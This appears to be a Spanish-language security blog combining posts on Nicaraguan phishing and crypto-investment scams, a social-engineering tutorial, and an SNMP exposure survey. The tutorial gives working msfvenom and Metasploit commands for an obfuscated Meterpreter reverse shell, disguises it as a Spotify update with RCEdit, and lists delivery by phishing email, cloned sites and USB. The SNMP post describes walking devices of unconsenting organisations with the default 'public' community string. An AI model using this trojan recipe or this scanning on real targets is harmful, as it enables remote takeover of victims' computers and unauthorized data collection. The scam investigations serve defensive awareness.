Estafas (Scam) relacionadas a Inversiones y criptomonedas en Nicaragua Parte 2 | Infraestructura

Campaña de Phishing - Banpro

Esta es una campaña que esta creciendo en el país, a tal punto que hace ver que hay agentes internos y externos involucrados en este grupo de agentes maliciosos. Hay varios puntos donde partir pero en este caso iniciamos por el dominio https://hyracoidea.shop el cual se hace pasar por una “Financiera” de inversiones en Nicaragua

El dominio hyracoidea.shop está asociado a la dirección IP 172.67.155.38 y utiliza Cloudflare como servicio de protección para ocultar la IP del servidor raíz. El dominio fue registrado recientemente el 2 de febrero de 2025 a través de Namecheap, y los registros WHOIS indican que los Name Servers están configurados para apuntar a los servidores de Cloudflare. Además, el país de registro está especificado como Islandia.

Este dominio incluye rutas automatizadas y estáticas como: https://hyracoidea.shop/ni/banpro/signin3/, la cual redirige directamente a un chat interactivo entre el usuario y un supuesto agente de Banpro.

Este Phishing es una simulación de Chat Automático, utiliza intervalos de tiempo programados para mostrar mensajes predefinidos de manera que pueda imitar una conversación real.

Introduce un personaje falso llamado Blanca Quintero, que dice representar BanPro Invest, una supuesta plataforma de inversión, hace preguntas dirigidas a obtener datos sensibles como: Ciudadanía, Edad, Ingresos mensuales, Experiencia en inversiones, etc. Cuando se llega a la última pregunta se activa un formulario para capturar información adicional (Nombre, Apellido, Correo y Teléfono).

Código fuente del dominio https://hyracoidea.shop/ni/banpro/signin3/

Una vez es completado el ingreso de los datos eprsonales solicitados, la web te redirije a otra ruta y te indica que esperes la llamada del supuesto agente Banpro para finalizar tu proceso de registro.

Página post ingreso de datos personales.

Este phishing incluye la biblioteca intl-tel-input para validar números de teléfono. Esta herramienta ayuda a asegurarse de que los números sean reales y estén en el formato correcto antes de enviarlos al servidor. También implementan Twilio en el Phishing, lo que permite el envío de SMS con nombres de remitentes personalizados, o números que pueden parecer oficiales de la entidad bancaria.

Los atacantes envían códigos que parecen de autenticación de dos factores (2FA) lo que permite realizar un punto de validacion y de confianza para la víctima, los SMS contienen enlaces disfrazados de oficiales que redirigen a páginas falsas de inicio de sesión o verificación.

El dominio hyracoidea.shop tiene relacion con otros dominios que al igual que en Nicaragua, están en campaña activa como son: rockier.life, fourieristics.shop, financer.id, sabians.shop, xtannings.shop, hadarus.life.

Dominios que cuentan con la misma plantilla web asociado a diferentes paises

Nicaragua
Nicaragua
Argentina
Argentina
Indonesia
Indonesia
Perú
Perú
Nicaragua
Nicaragua
Argentina
Argentina
Perú
Perú

Por ahora lo dejo hasta aquí, y eso que tengo muchisima mas informacion para validar y mostrar pero a falta de tiempo, lo tendre en 4 partes y no 3. Iniciando con una emulacion local del sitio para analizar los parametros  y archivos que podamos obtener del codigo fuente. Hasta el próximo capitulo.

Estafas (Scam) relacionadas a Inversiones y criptomonedas en Nicaragua

Historia de las Criptomonedas en Nicaragua

La primera transacción con criptomonedas en Nicaragua fue registrada por El Nuevo Diario en 2014, cuando un ciudadano estadounidense compró un terreno en San Juan del Sur por un valor de 72,000 dólares, equivalentes a 80 bitcoins en aquel momento.

Desde entonces, en el país se han realizado numerosas conferencias y presentaciones sobre inversiones en criptomonedas, incluyendo eventos en prestigiosas universidades como la Universidad Americana en Nicaragua. Estos estudios han promovido el conocimiento sobre blockchain, smart contracts y otros conceptos relacionados con el ecosistema cripto.

Campañas de Phishing en Nicaragua

Actualmente, se está ejecutando una campaña de phishing muy bien elaborada. Esta campaña utiliza la imagen de entidades bancarias como Banpro y BAC en mayor medida. Además, emplea un diseño minimalista similar al de los diarios en línea La Prensa y Confidencial.

También se ha detectado el uso de la imagen del comediante JR como figura principal en la estafa, acompañado por Xiomara Blandino y el Presidente Daniel Ortega. Anteriormente, se utilizaron imágenes de periodistas reconocidos como Carlos Fernando Chamorro, Lucía Pineda Ubau, Bianca Jagger y Miguel Mora. En menor medida, se han observado páginas asociadas a figuras políticas como el expresidente Arnoldo Alemán.

Este es el primer artículo de una serie de publicaciones sobre este tipo de estafas. Estoy realizando un seguimiento detallado de cada dominio involucrado, las cuentas en redes sociales asociadas y toda la información posible para comprender la estructura de este grupo que lleva a cabo estas campañas de phishing.

Se trata de un esquema bien elaborado y sofisticado, que incluso utiliza videos generados con inteligencia artificial para hacer parecer que los mensajes provienen de las figuras mencionadas o de otros personajes populares en Nicaragua.

Estafa de la Aduana

Los atacantes obtienen credenciales de Facebook mediante phishing y técnicas de ingeniería social. Una vez que tienen acceso a la cuenta, analizan las conversaciones para identificar posibles víctimas. Luego, contactan a los familiares y amigos de la persona cuya cuenta ha sido comprometida y les informan que esta llegará pronto al país con regalos costosos como iPhones, MacBooks y computadoras gamer.

Para recibir estos regalos, los estafadores solicitan privacidad para no alertar a nadie mencionando que es una llegada de sorpresa, pero necesita pagar aduana porque ya todo esta en Nicaragua, lo cual le solicita un préstamo para los supuestos trámites aduaneros, exigiendo que se realice mediante criptomonedas. Una vez recibido el dinero, bloquean a la víctima y continúan con otras personas dentro de la cuenta hackeada.

Casos relacionados en Otros Paises

estafa-correos-tasas-aranceles-aduana-1
sinai-confio-en-que-estaba
estafa-sms-correos-aduanas_01-1024x684

Emergencia Familiar, Amigos o Pareja

Similar a la estafa de la aduana, los estafadores acceden a cuentas de redes sociales y analizan los contactos de la víctima. Luego, informan a los familiares o amigos cercanos sobre una supuesta emergencia, como enfermedad, fallecimiento, pérdida de pasaporte en el extranjero o problemas legales.

Solicitan dinero con urgencia y exigen que el envío se haga con criptomonedas, argumentando que es la única opción disponible. Tras recibir los fondos, desaparecen.

Evidencia real de este tipo de estafa

IMA07
IMA01
IMA02
IMA03
IMA04
IMA05
IMA06

Estafas con Plataformas Piratas

Los estafadores crean plataformas falsas de inversión utilizando scripts adquiridos en marketplaces como ThemeForest por menos de 20 dólares. Estas plataformas pueden operar de forma manual o automática, incluyendo integraciones con hot wallets y sistemas de recepción de pagos.

Los atacantes atraen a inversores prometiendo retornos extremadamente altos. Una vez hecho el depósito, las víctimas ven crecer su dinero en la plataforma, pero estos únicamente son números, los fondos ya han sido robados, y cuando las víctimas intentan retirar fondos, se les exige un pago adicional para obtener un “token de retiro”. Una vez realizado este pago, los estafadores desaparecen con los fondos del supuesto token.

Ejemplo de plataforma de Trading utilizada para estafas

nishue-platform
front-crypto-platform
admin-panel
front-crypto-platform-admin
user-admin-crypto-platform

Estafa Binance

Mediante publicidad en redes sociales, los atacantes se hacen pasar por Binance en la publicidad y prometen bonos de entre 500 y 5,000 dólares en USDT a cambio de una inversión o de sus primeros movimientos en la plataforma. Las víctimas deben enviar fondos a una cartera cripto y es ahí donde los estafadores desaparecen.

Evidencia real de este tipo de estafa

Screenshot (75)
Screenshot 2024-07-06 122926
Screenshot 2025-01-05 100949

Descargas de Aplicaciones Maliciosas

Este es uno de los fraudes más peligrosos, ya que expone a las víctimas a un control total de sus dispositivos por parte de los atacantes. Los atacantes promueven aplicaciones falsas de Binance en redes sociales, diseñadas para parecer versiones de escritorio de la plataforma pero únicamente es un malware que al instalarse desaparece del escritorio.

Al instalar la aplicación, el malware roba credenciales bancarias, claves mnemónicas de carteras cripto, imágenes y videos con datos importantes como fotografías de identificaciones, etc. Los atacantes pueden drenar cuentas bancarias, vaciar wallets y realizar compras fraudulentas en plataformas y más.

Evidencia real de este tipo de estafa

bybit-desktop
binance-desktop

Diarios Nacionales Falsos

A través de redes sociales, los estafadores crean anuncios que simulan ser medios de comunicación nacionales. Publican entrevistas falsas con figuras reconocidas de Nicaragua, afirmando que han encontrado un método infalible de inversión que el Banco Central de Nicaragua quiere censurar, todo en criptomonedas.

Los enlaces proporcionados llevan a páginas de registro donde las víctimas ingresan información personal y datos financieros, permitiendo a los estafadores idear de manera eficiente la forma de robar sus fondos.

Evidencia real de este tipo de estafa

Screenshot 2025-01-13 145445
la-prensa-fake
confidencial-fake
confidencial-jr
laprensa-fake
confidencial-fake-jr

Estafa con Billetera Banpro

En esta modalidad, los atacantes promocionan falsas oportunidades de inversión mediante perfiles que simulan ser personas exitosas. Utilizan videos que muestran supuestos depósitos en aplicaciones bancarias nicaragüenses para ganar credibilidad.

Solicitan depósitos a través de la billetera Banpro. La Billetera Banpro es una aplicación que permite recibir dinero con solo un número de teléfono, esta puede descargarse desde Play y App Store. El registro en la Billetera Banpro se hace con un número de cédula válido. Una vez recibido el dinero, la cuenta es eliminada y la cédula puede reutilizarse para abrir nuevas billeteras Banpro dentro de la red del banco. Posteriormente, los fondos son retirados de puntos Banpro sin necesidad de presentar identificación utilizando técnicas de ingeniería social o con apoyo del cajero de turno en el punto Banpro.

Este esquema sugiere la posible existencia de una red criminal organizada operando dentro y fuera de Nicaragua solo para esta operación.

Evidencia real de este tipo de estafa

banpro-5
banpro4
banpro-2
banpro-1
banpro-3

Actualmente, esta campaña sigue en ejecución y continúa expandiéndose. Esta es la primera de tres investigaciones que compartiré. Las próximas dos estarán enfocadas en la estructura operativa de estos actores maliciosos, incluyendo el seguimiento de dominios, grupos de chat, tecnología utilizada en las campañas de phishing y otros detalles clave.

Ingeniería Social y Payloads Maliciosos: Técnicas Avanzadas y Acceso Remoto para Pruebas de Seguridad

En este tutorial podré en uso técnicas de ingeniería social para obtener acceso remoto a una máquina víctima y establecer una sesión de Meterpreter mediante un payload malicioso generado con msfvenom en Kali Linux, también utilizaré RCEDIT en Windows para modificar el ícono del payload, haciendo que sea más convincente para el usuario objetivo de esta prueba de seguridad.

Generación del Payload con Msfvenom

Usaré msfvenom para crear un payload ofuscado (ofuscación mínima) que ejecutaré luego en la máquina víctima. 

kali@kali# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.14 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe –platform Windows –arch x86

A continuación una breve explicacion de los parametros utilizados para crear el payload:

  • -p windows/meterpreter/reverse_tcp: Este payload establece una conexión inversa desde la víctima hacia el atacante, ideal para situaciones donde la víctima está detrás de un firewall o NAT.
  • LHOST y LPORT: Define la IP y puerto del atacante que recibirá la conexión inversa.
  • -e x86/shikata_ga_nai: Encoder para ofuscar el payload, haciéndolo más difícil de detectar por Antivirus, IDS, EDR, etc.
  • -i 10: Indica el número de iteraciones de codificación para incrementar la ofuscación (pueden ser tantas como dees).
  • -f exe: El formato de salida será un ejecutable para Windows “exe”.
  • -o payload.exe: El nombre y formato de salida del payload malicioso (Debe incluir el “.exe” aún que esté ya definido).
  • –platform Windows –arch x86: Especifica que el payload está dirigido a una plataforma Windows con arquitectura x86 (32 bits).

Añadiendo una Capa Extra de Ingeniería Social: Modificación de Iconos con RCEDIT

Una vez generado el payload, es crucial adaptar su presentación para que pase desapercibido en el sistema de la víctima. Como parte de mi estrategia de ingeniería social, voy a renombrar el archivo según el contexto de la víctima y personalizar su icono para hacerlo parecer legítimo. Este paso le añade una capa adicional de engaño, aumentando la probabilidad de que el objetivo ejecute el archivo. 

¿Qué es RCEdit?

Es una utilidad diseñada para modificar los metadatos de un archivo “.exe”.  Tambien me permite cambiar aspectos como el nombre de la aplicación, la versión, y lo más impornate para este caso, el ícono que se mostrará cuando el archivo sea visualizado en el sistema operativo Windows.

Esta personalización es crucial para engañar a la víctima y aumentar la efectividad del ataque en pruebas de penetración.

Descarga RCEDIT desde Github: https://github.com/electron/rcedit/releases

Aplicación del Ícono al Payload con RCEdit

Con el ícono adecuado, el ejecutable de rcedit descargado desde GitHub y el payload listo, voy a proceder a realizar la personalización final… modificar el payload y agregar el ícono. En este caso utilizaré el icono de spotify para esta prueba de seguridad, al ser una aplicación popular, puede pasar como una actualización de la aplicación en la computadora víctima.

Elegí Spotify como icono bajo el siguiente escenario: “En el estudio del usuario victima, a este le encanta escuchar spotify, información que se puedo recopilar atraves de OSINT en redes sociales donde en fotografías del usuario víctima en su centro de trabajo, se logra ver que en la pantalla de su computadora esta reproduccioendo Spotify como aplicacion instalada en la compuadora, para lo cual le haremos llegar una actualizaición para su plan Premium”

Abrimos un terminal en la ruta donde tenemos los archivos en Windows y ejecutamos el siguiente comando

PS C:\Ruta_de_usuario> ./rcedit-x86.exe “payload.exe” –set-icon “spotify.ico”

Una vez terminado el proceso, nos mostrará el payload con el icono que acabamos de agregar. Lo que resta es cambiar el nombre del payload para hacerlo más atractivo para el usuario víctima de la prueba de seguridad. En este caso unicamente utilizaré el nombre Spotify, pero podria ser spotify_update_plan_premium, un ejemplo de agregar mas credibilidad al payload.

Métodos para Entregar el Payload a la Víctima

Existen diversas maneras de hacer llegar el payload malicioso a la víctima, y en este punto es crucial aplicar los conocimientos obtenidos durante la fase de investigación y análisis del objetivo. Cada método de la prueba debe adaptarse a las circunstancias del entorno de la víctima, aprovechando las vulnerabilidades identificadas y garantizando que el payload sea ejecutado.

  • Envío por Correo Electrónico con Ingeniería Social
    Se puede crear un correo convincente como un mensaje de confianza del desarrollador de la aplicación, solicitando la actualización de la misma mediante el archivo adjunto, que en este caso es el payload.
  • Descarga desde Sitio Web
    Otra técnica es crear una copia del sitio web legítimo con un enlace para la descarga del payload cuando el usuario accede al sitio, haciéndo se pasar por soporte técnico de la aplicación, metodo el cual tambien podria realizarce via correo electronico, mensaje de texto o WhatsApp.
  • Uso de Dispositivo USB
    Facilitar y/o hacer llegar el payload a través de una USB, este punto requiere un acercamiento más directo a la victima, proceso que va a depender de las circunstancias en las que se realiza la prueba de seguridad.

Estos son algunos métodos que pueden ser viables al realizar esta prueba de seguridad. El conocimiento que tengamos sobre el objetivo de la prueba y el perfil del sujeto al que se dirigirá el ataque son factores determinantes en la efectividad de estos métodos.

Para continuar con la prueba de seguridad, hago la configuracion del dispositivo atacante Kali Linux donde establezco el equipo en modo escucha utilizando Metasploit Framework.

kali@kali# msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.0.14
msf6 > set LPORT 4444

Ahora procedo a iniciar el listener

msf6 > exploit

Una vez ejecutan el payload en el equipo víctima, se inicia la conexión remota estableciendo la sesión meterpreter a través de la cual podo continuar con los procesos post-explotación.

En este tutorial he explorado el uso de técnicas de ingeniería social para obtener acceso remoto a una máquina víctima mediante un payload malicioso creado con msfvenom. Comencé generando un payload ofuscado que establece una conexión inversa hacia el equipo atacante. 

Luego, apliqué RCEdit para modificar el icono del payload, haciéndolo parecer más legítimo y aumentando las posibilidades de que la víctima lo ejecute. Mostré unos metodos de entrega, incluyendo el uso de correos electrónicos convincentes, descargas desde sitios web y la entrega directa a través de dispositivos USB.

Establecí Metasploit para recibir la conexión desde el payload. Al ejecutar el payload en la máquina víctima, se estableció la sesión Meterpreter, permitiendo llevar a cabo acciones post-explotación.

Este enfoque demuestra cómo combinar habilidades técnicas y estrategias de ingeniería social para realizar pruebas de penetración efectivas.

14 mil servicios SNMP activos en Nicaragua: Análisis a 5,500 dispositivos en busca de exposición de información sensible

Antes de empezar, los invito a visitar mis estudios anteriores en exploit505.blogspot.com mientras realizo la migración completa.

Explorando SNMP: ¿Qué es y por qué es importante?

SNMP (Simple Network Management Protocol) es un protocolo que opera bajo un modelo cliente-servidor, diseñado para administrar y supervisar dispositivos en una red como routers, switches, servidores e impresoras ademas, facilita la recopilación de información y la modificación de configuraciones en estos dispositivos.

Las versiones de SNMP incluyen SNMPv1, SNMPv2 y la más reciente, SNMPv3 que mejora la seguridad mediante autenticación y cifrado de mensajes, a diferencia de las versiones anteriores donde los mensajes viajan en texto plano sin cifrado.

Parte de los Riesgos de Exponer el Servicio SNMP en Internet es que un atacante podría obtener acceso a datos confidenciales de la red como la topología, configuraciones específicas de dispositivos y otros detalles operativos comprometiendo la seguridad de la infraestructura y generando vulnerabilidades que podrían ser explotadas en el futuro.

SNMP Activo en Nicaragua: Análisis de 5,500 Dispositivos en Busca de SNMP Expuesto en Internet:

Actualmente (DIC-2023) Shodan muestra +48 mil servicios activos para Nicaragua en su base de datos, de estos, +14 mil servicios están activos en el puerto 161, puerto default para el protocolo SNMP, esto me llamó mucho la curiosidad ya que sobrepasa por +9 mil comparado con otros puertos y servicios activos a nivel nacional.

+48 mil servicios activos en Nicaragua según Shodan
+14 mil servicios SNMP activos en Nicaragua según Shodan

Investigando información sobre vulnerabilidades y servicios maliciosos relacionados al puerto 161, encontré un artículo relevante sobre SNMP, un post de Deral Heiland para realizar harvesting en SNMP activos.

SNMP Data Harvesting During Penetration Testing

En este artículo, el autor utiliza un script en Perl para ejecutar un comando snmpbulkwalk en cada host que exponga SNMP en el puerto 161. Cuando encuentra un dispositivo con SNMP habilitado con la community string “public”, el script recorre todas las tablas MIB, recopila los datos y los almacena en un archivo.

Me pareció fascinante replicar esto en Python, basándome en el script original de Heiland disponible en Github.

El core del codigo en Python responsable de ejecutar snmpbulkwalk sobre cada direcci'ón iPv4

Una vez hice el test del código, procedí a crear un codigo en Python para extraer todas las direcciones IP atravez de la API de Shodan, la cual únicamente me permitió extraer 5,500 direcciones IPv4 de +14 mil dispositivos activos.

Script en Python para extraer las direcciones IPv4 de los dispositivos activos en el puerto 161 SNMP vía Shodan API

Ya con las 5,500 direcciones IPv4 activas con SNMP, procedí a ejecutar el script snm.py (snmpbulkwalk) considerando todos los riesgos legales y utilizando una VPN, buscando acceso a lectura de información mediante la community string “Public”.

El resultado total fueron 120 dispositivos que pude tener acceso mediante la community string “public”

 
Script ejecutando snmpbulkwalk a 5,500 dispositivos activos en Nicargua
Archivos almacenados como resultados de las solicitudes con snmpbulkwalk

Dentro de los archivos hay un serie de valores de carácter jerárquico los cuales identifican un valor asignado o una propiedad del dispositivo administrado vía SNMP, como por ejemplo los dispositivos conectados a la red LAN o WiFi, las interfaces de red activas, dirección MAC de dispositivos conectados y muchísima más informacion de valor.

 
Información almacenada en el archivo de cada servicio SNMP activo con Community string "Public"
Información almacenada en el archivo de cada servicio SNMP activo con Community string "Public"

No voy a adentrarme en la información recopilada de cada dispositivo con SNMP activo, si nó, en el nombre de identificación de cada dispositivo para tener una visual de cuales son las compañías que están en riesgo por filtrar información sensible

Lista de dispositivos con información disponible a internet mediante SNMP
Lista de dispositivos con información disponible a internet mediante SNMP

Como resultado de de este estudio sobre la exposición de servicios SNMP a través de internet en Nicaragua, logré analizar 5,500 dispositivos y de este considerable conjunto, únicamente 120 dispositivos arrojaron resultados positivos al utilizar la community string “Public”. Es esencial destacar que estos dispositivos pertenecen a diversas compañías de capital nicaragüense y extranjero, así como a organizaciones gubernamentales, particulares, servicios de cajeros automáticos (ATM), corporaciones y hoteles, entre otros.

Este hallazgo pone de manifiesto la vulnerabilidad de un amplio espectro de entidades ante posibles amenazas, al exponerse mediante el uso de una community string tan genérica como “Public”, en vista de estos resultados, se hace evidente la necesidad de considerar la migración a SNMPv3 para aquellos que gestionan dispositivos de forma remota. SNMPv3 ofrece capas adicionales de seguridad, incluida la identificación de usuario y la encriptación de datos, proporcionando así una solución más robusta en comparación con las versiones anteriores.

Adicionalmente, es importante implementar contraseñas sólidas al configurar servicios SNMP ya que son susceptibles a ataques de fuerza bruta, el uso de contraseñas seguras es fundamental para mitigar posibles riesgos. La exposición de servicios SNMP en Internet, como el mencionado anteriormente, deber ser tomada con extrema seriedad, dada la sensibilidad y la criticidad de los datos y dispositivos alcanzados y sin ningun tipo de seguridad.